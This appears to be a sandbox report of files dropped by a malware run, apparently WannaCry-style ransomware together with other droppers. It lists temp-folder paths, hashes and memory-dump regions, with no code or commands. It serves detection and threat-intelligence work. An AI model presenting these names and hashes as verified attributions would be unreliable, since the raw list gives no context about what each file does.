MD5 be52ed7adbfd5cc046ea311cfec478f9
SHA1 12bf51bd7be562c451fad7589e6fbe46d88b7f3b
SHA256 54047ece83c7b6ceca7ac8cb90997a6676d5da5328786d40710b55ddffc66a85
SHA512 523a22eed980b35d5c82172ca5f5960b15248c00c5131250f04e6555e85c3e07e9a4d0c34ec1d613d35fdfaf11033e91ec74e32972441c45e6fab08865dd6679

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

MD5 ab8a87ea8bd9395dd975748faf4286eb
SHA1 fd0b05e3738127f277006230d8ef974514271067
SHA256 7457134ec28b8317456238d58d1df26227ff15418455ee7088e12e19ecf89a00
SHA512 0f18919379e9e943811f4fd6fb3e9b6df61e6447a274a371545ce2556a56d6e7762d12397f216496462dbbb2b0e89feae78931dca164c689b7fb5a70438b1948

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

MD5 9bb60e84b0179c01a4caa45b3d76616d
SHA1 aefb0049e2a40d4e6aa2940217b5826ea8dac355
SHA256 c9442288ff88d7c193e09ad6250cec9e90aa9fa5106971c360dd368b25b39d0e
SHA512 65c91d91ad3d671b7be03ac1f3c26c32818824c52597a8ff7bf478eb24044d8edd9c6d6d98f954d1643bde7deaad4f5906aa73f075d099473a9b6d2d13fea765

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

MD5 0e7b3d467b4bf12f261ac15cbd4e4ad0
SHA1 85ecea1168b61f7bdee7f25dc542aa3f555f4e11
SHA256 9071ff8442b717b305f9f3a1645963be37ab763dcbd049189878f91203f85502
SHA512 be74932a6325756fdc03a453b6daa437be273694cf03460cbaf6ac4abd2be78575cc91a3418a7f35fd27250abbe3c1db02b6e3a7d6eb68a7a99978411387d6c2

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

MD5 4c841252e0c19c31aa5bf51b1b97ca1c
SHA1 1fce599e65a65c0d1be6c763b069a569e6a51557
SHA256 27e918315a78b0f5670f1d196567656ff2a06ecec5e1ee3cc7b18ee54ff11f5d
SHA512 d179f32dfb0fc54e07d3caf587db34b15b34824b9f78163b8aca32a1115aa31725f3f0ec36085da3b759cb2912192d74da4dc58451ea3455e2c0c0fe60a4b88d

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

MD5 c176a56976a53db220455bca57e3fadc
SHA1 5782bb222ca5c755a67087bf5299f6577bfce13a
SHA256 606b812107f0f5d8c635391661aad8204c7ead0e2fecc8f7901120b9763f2e07
SHA512 bd0fa808ed67ce50b618fd36383a66fa2c4c15e73e2d4867bc9b3a8a7269b43cf52691f21c8e049f1a400dd4908671b3b5f7a9d0e78b43c44acf0da348ca94de

memory/3040-108-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/1056-116-0x0000000071380000-0x0000000071931000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

MD5 2a918c6af1ac59018865536790152f30
SHA1 37221e0dc9e8eac739e27686d7600396cb994c8b
SHA256 6384d623b742f9b782e0d34a05cba29e29387b53353b09a7b4cf6f58d75c7d91
SHA512 648c31e34144cbe664e1bf9a992aa86c0ba9edc93c522afee79f173998b619a621b284f71155a7c849ab9d7b26bd886505c133dae9cf272d924d7bb50fb0881b

memory/2968-119-0x0000000005740000-0x0000000005750000-memory.dmp

memory/2820-121-0x0000000004D60000-0x0000000004D91000-memory.dmp

memory/3692-125-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\u.wnry

MD5 7e0ea469a1bb4d823eca47d934e12936
SHA1 62c8debf2757ebe0ed252d20d893904e5c853642
SHA256 32fcae401d1995733e0738d5230ff44bc910758c96788e81da46df2925d9ec9d
SHA512 1c15b42d27bd548ed6c1a524094f7cce8e1d495b4c1517fdee9b7710ff2e461a104e282ec5971a54e770204d8c88438f82b309a2c683d71c24dcb6f23fe2df23

C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp

MD5 f63ccc183ad4a0d346b79fc5942e033c
SHA1 400c06a122b8d753ae265b9a7042c4454acdb576
SHA256 7c7153d8dda70da2b2fa66401c10835c7c1f45cd46ae08c56252a46cfbc00dce
SHA512 dac54db70a99fc6cfa618a7a5b9fe6805a9f002970004a282027e8d1167c9dbedc3fb3696f3f361283a299a1ed428ede7601903661587b73bbad0fc4ad50c976

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

MD5 8495400f199ac77853c53b5a3f278f3e
SHA1 be5d6279874da315e3080b06083757aad9b32c23
SHA256 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
SHA512 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

memory/2696-174-0x0000000000B00000-0x0000000000B01000-memory.dmp

memory/3564-175-0x00000000026D0000-0x00000000026D1000-memory.dmp

memory/1056-173-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp

MD5 2a33e498e4ea29528d067d4a87c088dd
SHA1 91b129dee569e2ec50ba0801b3d795455eeb79fa
SHA256 e8bca6790df52373db9cbe2deadefded0592ed5847f2e2ae0167843c51fd1cac
SHA512 15d8c6defed853a9652da7d884e7a976024a1b6dc2c35eac466aa5f164a5c8ff6df0694a073e1d3e85efa91594c66779dcc7940856f5c5d12a3e3711418174dc

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

MD5 4fef5e34143e646dbf9907c4374276f5
SHA1 47a9ad4125b6bd7c55e4e7da251e23f089407b8f
SHA256 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
SHA512 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\t.wnry

MD5 4b29a17a89130f7cb7c3927670e32727
SHA1 008a15ec2525490f19cf4236b541f07deabaa7c1
SHA256 2a52c709e6cfa1007711fa680c4c0ee377d6bf951b9902e17511606269fcfa7c
SHA512 4aeade14a90cd346b75818e8cc5cdd4cf8d7de3a95e6b2a5bd1e281422818dfeb9d77323735be336826d5568914b2dc854af53d677d3515d00a5b5aa383c8a22

C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.wnry

MD5 31c408b5aac5a15b754375aab73e90ed
SHA1 9e8ce373694bc22cd3d2e8c5c38a5a77e4cc53e8
SHA256 077d1f5cbf3252e200d704d34df10ea9802967ba93f13dcc9c24f824627188d3
SHA512 13f76463afd3e9a7b29ebdec22974decb4b6810acad5ddd40fb62bca14440544f9ce2dd8c309fc506b0801eeaa07827999961424612bd9b36729efff4a106eb3

C:\Users\Admin\AppData\Local\Temp\RarSFX0\r.wnry

MD5 3e0020fc529b1c2a061016dd2469ba96
SHA1 c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade
SHA256 402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c
SHA512 5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_vietnamese.wnry

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_turkish.wnry

MD5 b6af54745d959c76a74168722db5a1d1
SHA1 14a4f14f6a936211839457ff6a2a256e8abb73c9
SHA256 e0164441efe234d7a658f1e8746cba68d9fadbf988276e70c1d1ff40ace365e0
SHA512 b1a8a3a0d28dfccc6cbc17d9c1e5035b759ae02a88043e0290038ed656d10f08407e792d05b4a80f5972a1e67031b39ff58fd074f78d5ffb96e9d0c93b3e7f17

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_swedish.wnry

MD5 b3c44b54acaf002e4582b946da1cc425
SHA1 d5b7662b3eec6399d59b718a14e8b897eaf5256b
SHA256 0220f37ca591882129282127cdc4d6e2b83906c6782b2168d2e0bf0dab1f59ac
SHA512 11222c134b6f515250665c030650a3072940d8c0ef295b1b9bda0f7443d4c992602fd236ccab69703973be994c1cdf85da261601650b23b0642bc5428b22249d

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_slovak.wnry

MD5 0c729092b98313f258dd5a63f3b40526
SHA1 c917f91abe3716402655625af682b3e71661a974
SHA256 0a0d21e18628198eca0196272404661ac199f126f09b4518a9519bcc3d8de5b0
SHA512 c4a367fa8352469f29cc773c7690b4236d35845573f503e7649b3edc9af602362c657ef2edd0fd16622aa951433294d65cfdf86651dec598d4974a78354756c7

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_russian.wnry

MD5 5fa7e1c1db14a856fbd3cbd28ad60fa2
SHA1 864ca4fc50eaeb31fd8ba60b502094917a54812f
SHA256 cfad0e0f0bf9c491c01c74914fc8507b1af8f0dab29d5649582d0e93ac7dd4f5
SHA512 a18697dfb104bcb48964bbbefe91da6ed402726578741bacc11b269958b869998dc0fb815552f675e4bfef238d5d910c491a830cd89088746eac6526076fe374

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_romanian.wnry

MD5 e5bf360102cbe7a6c2d81b977fe76d4b
SHA1 93da73ca740e0dd41b194b02d07f8e07b21a85ac
SHA256 4c2730f571cb2f368754e94ad99957c0e79c74a4eca6ffcdf8350fee4e9d071e
SHA512 addbc26bc1a4d5d50e089286530da3d8e1a0f3e15f5b7a26975215e6b963da562aabead325c23b57697255c6531b43b6a3ee24e1e0b87e4ad30ba17e5c26ef14

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_portuguese.wnry

MD5 fa948f7d8dfb21ceddd6794f2d56b44f
SHA1 ca915fbe020caa88dd776d89632d7866f660fc7a
SHA256 bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66
SHA512 0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_polish.wnry

MD5 c63e7f2772b61e6772db4f919e9f9470
SHA1 967eccf7716d29ad6b6bceaa889f1e9beab0805a
SHA256 be81dfdf722539c593ba8ec9831cde820d14120df2375eb64cfa67f1326db24a
SHA512 c4850b724a00c18a0653b95ed51ebb88d3afd88a83b1ecf2891802b43b0a257c5ae0dd184c1261cbc2e366d7dbdef11f59b800ddc11aef2129d1ba45b999e9b9

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_norwegian.wnry

MD5 52a7d268be1371e1b7fcf588f8a2a504
SHA1 a1aae6ec46c3e29fada076784bb4c9bfe8368997
SHA256 3803a62dccc10da4fc1376175d4802edc50d753898a446092264948735086b43
SHA512 8c12fec1866ab44f7b605d613a20d24598d69bd2cc92af8f7924d3b94f4acd36d77daa36d5e3776421c6a95151fd98ac4b241a6f8ad9b5a61385df71a998a691

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_latvian.wnry

MD5 44d81377e2871d765f1dba38a7206908
SHA1 15025789a42c45d7967fab814b4672bdc77006a0
SHA256 9f48f1cad8c6feab6a40471d97b525aadc75463e8c4ff670c05b6652ca25b3c4
SHA512 f3060d5f668ec175d860aa184c0e45cd41e43bb718992983be9bd7b4ca32bb048c07136a50f58a52e8b0afe190a11d985a49ed7e7f0801fa6cfbed0af3b79a8e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_korean.wnry

MD5 a4f4868a0fdb9830775db4bbb68653d0
SHA1 b7d1ca04a50858ff895e3035256b9f988f819e28
SHA256 d3aa25802478b63609a2f3d246b9ccba63e4fbc3ac8a1017c4ef7337910d25cb
SHA512 54fe56a23a41a4d656c13792cc7f5e7d4c4cf498fa1c1633b4f49ebfedb77b70353eba374a9d88d6f002ab393654326ad75945d98b8931370056d0b712f92ba7

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_japanese.wnry

MD5 13f55c78e6964213539e87a5d6280336
SHA1 33a9db78d1eab5e0f596e2953719cd473cc1dd7a
SHA256 25303929d0254ff9f8b2db5665b3f1e39dfc6c6ea748040fdae48d944e8b9433
SHA512 44843efe575df092ea7c2ef9ebe71ba04ef0c9dc7384fc39cc6ff3c148a0db1cdf900783b61180e7f8c6ad6fe145950e4ac3310e4f6eee7e723c0000337409c4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_italian.wnry

MD5 06238400bd89929ce6d64eb6f09e3124
SHA1 0a55429af93b0ef031b863ea68a24aa54c569015
SHA256 cca740d29d8f8498783ef034d600d3a5d4b0fff1de78572645bb39c82f45c135
SHA512 9aa3b45dad57e8c21525cb7d6d9936d241864609bab7a8ad39e95882dede80d9fa5e1abaabb8ebef32eb6734a17c2b29fd62adc843db2d5bd3188ded7f76b724

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_indonesian.wnry

MD5 d8a702d2bbc88098cd372927548a54dd
SHA1 7f255f6ce0a05560d9c76e64160d3ff176170988
SHA256 7774f5a2935f8beb38b1c77d1ed6d719b590c803565cbac8e2064800d90287ff
SHA512 99b3960892cee7ae86ae47d2b5bbd67be55995736b2a8ea89b4ee07e1b30c37286462155d92c0268cf34e7a9b82b21c9b98531b3b439f55a2544ca99c25c11ee

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_greek.wnry

MD5 3b3caa108549c3ee0d03c79d76509e26
SHA1 0b4c32dd174a061d7b994e4be8bd310e6f07c3c7
SHA256 618f9bcda9cc93f63b90b0b64c56cc055ff3ba2aab9d2a112b2cd53aa390e858
SHA512 e94398c6f4d88fcfaa5db5d91a12e7f73dd1613445675df5b7765349c6a90964379f9ae293260272afbe1eefb4a195f6d032d7eb5f1f4c4890a39b8b67940330

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_german.wnry

MD5 d576972fd34d5e391c8f69b1773d468d
SHA1 fa6d6e59b85c893a74aa49f2af218c99af7d9d3c
SHA256 69938d64e8714749fc2f18f9ee00f0c362c1ecc49febb925a93e4fc1152c9c60
SHA512 12154997d3af3176b39d3e44f0c66ba6963a2635c6df00f41295c37b2cf5b26dcaeb508e4c9345fa2f86748847fcc331f401b038dac7a7e599851b7aafb52c95

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_french.wnry

MD5 4e57113a6bf6b88fdd32782a4a381274
SHA1 0fccbc91f0f94453d91670c6794f71348711061d
SHA256 9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA512 4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry

MD5 8b59a6dafeb889113f537ba9f3f68d9a
SHA1 37ded800ac1a9d7dad3e30043784aee309aff501
SHA256 8a7450193502129a3c9a3dd6c03d36ab6af0cacef6f769e7b208662bca9b916a
SHA512 2990bd93bfc3c4465f92c9a3904ca09b7fc7df2ac6ea9d6c259e981bc98a73aec455b43cd4d2d376ac7bac2a7ee2567a96e73b62f6cfecd725c9c19b564e2302

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_filipino.wnry

MD5 d8b643f84283ef38780b22df2690fbc5
SHA1 2da710d5b51bbf492ddff2116973618e121fbdf1
SHA256 d2643c1bb992bdd2674addab78124dd1b823fbad27b0ffb2ab97964698380f54
SHA512 d53f3310a2b4cb6523c5cd9536d709517e69f3e8dec555d2a0590e6bc2b4e8afd8aae71a97c4402cbf086879ab08708e19055b5f959894a99b0612ba11ddf3cb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_english.wnry

MD5 09339026f6c4cc6519ceb78cee41f7a8
SHA1 999b105f13889db78b51e6d733ba0634eb40f140
SHA256 6059c47dc5d7cdb8939c5bf5ccbba7507d521fe58eb38243b4b044b06f0e6e9a
SHA512 682a3597fec894f36a2875b623ee113617c3b5c49a6116b30e7576f7280a64c53db153f02430024a4130942aa3d341f3140161d548374d947f5e2f6719700c19

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_dutch.wnry

MD5 a1ec65cb7881fdb3b9f852b96b08ed60
SHA1 e4a1a6b3338eb3ea6483dd1b695a235643af8ddd
SHA256 f576bbb66934548174f8206524c425262197106bd7296ad8447b4db422c40dd3
SHA512 00c3fbf2cda202b95aa84370628722254955b8a67cf1d421490d77e08781ca6cbbac4f66530727d3c0c426ac56bdc80420d8ae320cc9daed40db2af2bdf67ee4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_danish.wnry

MD5 5fc276fe2e60f2aa47124ac162756b3a
SHA1 0bac176d411f7aaa3480e6df31b4ef406d23d53f
SHA256 d999ce05e5cf615718fcb6d9e2b36541b0e7f90520086b4b9fe2c0eb62c4efc5
SHA512 5b114602e996af265497f68a61322c6ac89ef017e6ce4b82e097e1b84ac045d7ffc085eb4c71b1f555f7b9ac6f2730ae6850bb427838d8fece05afa427faf540

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_czech.wnry

MD5 537efeecdfa94cc421e58fd82a58ba9e
SHA1 3609456e16bc16ba447979f3aa69221290ec17d0
SHA256 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512 e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_croatian.wnry

MD5 17194003fa70ce477326ce2f6deeb270
SHA1 e325988f68d327743926ea317abb9882f347fa73
SHA256 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512 dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (traditional).wnry

MD5 f1c82cc088a0d0a5837eda1ecb6b2706
SHA1 ed6c145014af6668a77a7afba363da5f4d603952
SHA256 4f639932798bd02340d4ac62b699035648d11195e0a87cfac7752d60f002f2db
SHA512 cd0cac0649c2da3dc4412b0017d6a2c6d9081600bcce3d000269f451bb9ea05810dbc06d2a032e350717b6956e445947cc8482819c13276e8217a467333c34b9

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (simplified).wnry

MD5 0252d45ca21c8e43c9742285c48e91ad
SHA1 5c14551d2736eef3a1c1970cc492206e531703c1
SHA256 845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a
SHA512 1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry

MD5 95673b0f968c0f55b32204361940d184
SHA1 81e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA256 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA512 7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 cbc2513313c5dc91d8eb80493a84e9bb
SHA1 ad7100ec8a97be5783fdb643412dda7333c0b696
SHA256 2853c7ace020e2b225bedf696e2bd7115e5f7662dded443f95da4a12a8afa8d1
SHA512 97fee7151451af9332aa6b8adf4e75c7d87ba628b169c5148e03b25d3cabf2db8685184dc45023fbbcb478ce73c5d41fcec241fb3c3833c0f43781671c6b31de

C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry

MD5 93f33b83f1f263e2419006d6026e7bc1
SHA1 1a4b36c56430a56af2e0ecabd754bf00067ce488
SHA256 ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4
SHA512 45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry

MD5 13632e7fb3da45891918880e54d74de0
SHA1 db45e41e6392342ebd5533be91b36ebc82e0a492
SHA256 3ade37a62e7b4f9c8e20de67ba04dfd70514f51a3de13033972c69fcd3e53de7
SHA512 6437ffae85c2bd0bd24fd8e380ce2fb5140752a0f66ccfb885d1c26a51e36ad770cc11d73322a8ffc681286b87032ecc48498ca8a26e210a04591db512a9b11b

C:\Users\Admin\Desktop\1.exe

MD5 69a5fc20b7864e6cf84d0383779877a5
SHA1 6c31649e2dc18a9432b19e52ce7bf2014959be88
SHA256 4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2
SHA512 f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

memory/2864-163-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\139781704838811.bat

MD5 56bda98548d75c62da1cff4b1671655b
SHA1 90a0c4123b86ac28da829e645cb171db00cf65dc
SHA256 35e5885504a1745554c26f49a0adab2d26a532838f8e495f211572d42ea19ead
SHA512 eefeab1311ded740628cf3fed32e750266dd2daa833ab8212f8ffe548967f0bd94e48cf11c75345150885268404c0275aab56b4210fb4f21883046611a567a72

C:\Users\Admin\AppData\Local\Temp\6021.tmp\6022.tmp\6023.bat

MD5 76688da2afa9352238f6016e6be4cb97
SHA1 36fd1260f078209c83e49e7daaee3a635167a60f
SHA256 e365685ea938b12790a195383434d825f46c41c80469ce11b9765305780bff7a
SHA512 34659bf4de5c2cbd7cdc7309a48880ac2e1f19e0a4da0c1d4cc45658a81f9f4e7a9293be48e853de812a6b94e1caa3356a715a1a0c14d37b7ae99ba5888bd1df

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

MD5 74c3ea3eb4374d5441de72fe02e8c26e
SHA1 942d3b30afc504d919755a082e2a36c1f0a5ce07
SHA256 c41d7989dc7f12819e2d28433bce982a85a29b02d0b5ab5e8ba2f4cb9c63b17d
SHA512 65a4ff2ef5062cf8d3bf2e7bca84c40f521db3d2d6cc0512fccb2bf6a098a9f035614dcea4ef99a6087a3091e6cc0a9badc8eb8e36ec498ee237dde737ad1c3f

memory/1056-123-0x0000000071380000-0x0000000071931000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

MD5 eee76cd2926ae642f7b1e42f9b5fdb02
SHA1 f8f1e87feaf9b4f50a4ad003d2a20979188ac359
SHA256 3df7db4eb423b3aa51108a38e7aeb7e5b3f493268653f3f185df5eeee7daf9b1
SHA512 57e92dc213f9c4060c82075aa3f11893bc1cd3a854dd38b38849c6e80accdab2f6ba070f67ec4cdf8990d052c50152e4f6d5614f22473ef3bd67a1ae1a7eeaac

memory/2864-115-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

MD5 323fc6593a61f719893badd2d3997169
SHA1 c47ed48cb74e609d2abf2a4f75af2a538019cc1a
SHA256 6b58869db901fdc07abb996460b7642564544d8dfc2e7fc3aeff584930200bcf
SHA512 cb736ade9b154086e7bc21de1685dcddbcb839d423e809ff76ecb6b5fc31c4cad47c47a44908a596eb49b90049723d23f3e405a20da39fd083f86cc5b656c139

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

MD5 7e6b6da7c61fcb66f3f30166871def5b
SHA1 00f699cf9bbc0308f6e101283eca15a7c566d4f9
SHA256 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e
SHA512 e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

memory/3692-110-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/3040-342-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/3040-317-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/3040-304-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/1056-109-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

memory/3040-106-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/2968-104-0x0000000005770000-0x000000000580C000-memory.dmp

memory/3040-102-0x00000000022D0000-0x000000000239E000-memory.dmp

memory/1056-397-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

memory/2968-99-0x0000000000F00000-0x0000000000F08000-memory.dmp

C:\odt\OFFICE~1.EXE

MD5 7abcd60a54262f5390ee428c6a3df985
SHA1 d51fc0f9699a096cbab0e3121e0924c7c2da36cb
SHA256 26397f9a68f52af28275feb29955c4294a933c700cb81fa7100dfd513c88fc96
SHA512 41e8fca63e633ba4283a8968ddc23fe3905ec3641c1a804aa18ca7f53d0a5e0627e7bdacabfe8c40b3f8d343d797cfa30bc41ccbd5efeb03697fb81880e06f7c

memory/2820-94-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Recovery\WINDOW~1\@WANAD~1.EXE

MD5 c889426a2b2c4bd5399329a6c4a89fa8
SHA1 ed7b1b12e965f2c504303d12920404d1ad010c11
SHA256 885c612582aa263b1018fdd452ec03dc7369dcecfeed49d8f22a38cd2226c43c
SHA512 0514571b0607e3528eade9ae5c429db0ad48aff11acd3511de0715ad0b24f19da11b4b1eaf9bd5d8839edc7aec18f76a70626d0ada7c9e6fa7b904daca063a73

C:\PROGRA~3\Windows\csrss.exe

MD5 90b5351a414e60af5b22fe9d63678f64
SHA1 01216b4788aa9c740f03143a940ff2d18d070485
SHA256 eb22ef4ed6f1afb089b0fffe05a5f6829bf42ccb47a3a3e0cb57c63d434396b9
SHA512 4a3f837e4027cea887e4c82218d2659337b299e78cd2ea7cf1f3e28dcaef4c648fb221b90bd5da6bc64e4744c069893454286c4c9b01b7941d133909a6b7ee02

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

MD5 5ff175dc40f188450c094cd781aa4e9b
SHA1 5b719f7e2fcc97c8356de5ed7297329b861ddc5e
SHA256 d117deb358e43ce9cd465d951fe4eee68224229238c5c518856c924dc9346266
SHA512 976412e3a4ce8d6daef9cf5557dfb50c41055f25e8afdb800c84cd93dfa9d75fd133708185e43f60bd103bd13e0a72e5a44784b9efa5f3427f233b60164cf8ca

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

MD5 f6524ed8c8f2003fcf3d09348b733f97
SHA1 2b7273d598fbd13f7f0d8217dc0825b97b1a961b
SHA256 aa9f02667887802e2f669f1899cb1326763b588d913b089d2435220b5859f105
SHA512 9f77418535641644b0125bf13281d5510c85efb8e634a645c8575803cc1e2f87ead5595ac2b41243c53dbd00cc93b1066fe4e18a1c5d640a018081d9d9110a59

memory/2968-75-0x0000000072E20000-0x00000000735D0000-memory.dmp

memory/3880-84-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 601f7b561ea2df3828f7c8b1a4d9af94
SHA1 96e65610f452418b10e87b4aadfac669236be648
SHA256 d71ae33d38007ddd9aa46e45ad347927b53b144840eb5fd9638606f142bad85b
SHA512 07b774d3a09129cfdcb2982b1f3709e101f17198c52a279d8ebf8b9d73f220745d2f0a822c6e8980afd2253e5cd931af5a2a3c66c6d5daa8c190542f5d271901

C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

MD5 2a94f3960c58c6e70826495f76d00b85
SHA1 e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512 fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

memory/3416-576-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Windows\directx.sys

MD5 e08da1f05efb3b6d438640a92d92761c
SHA1 cd8f9ad002181ebf87a3625734498ddc4a50ec59
SHA256 b981c91e4a64e872ae4c83dc193e4a5b3007a36f2b9e24b065aae6105ebd8a52
SHA512 e4c128d705de71ab84d99894deba6e52b01a22d95186008febdffab21084ae3f4ea601bf610a4f94c717f68f00eb177a20b4008c91227671b7b08548a6b1067d

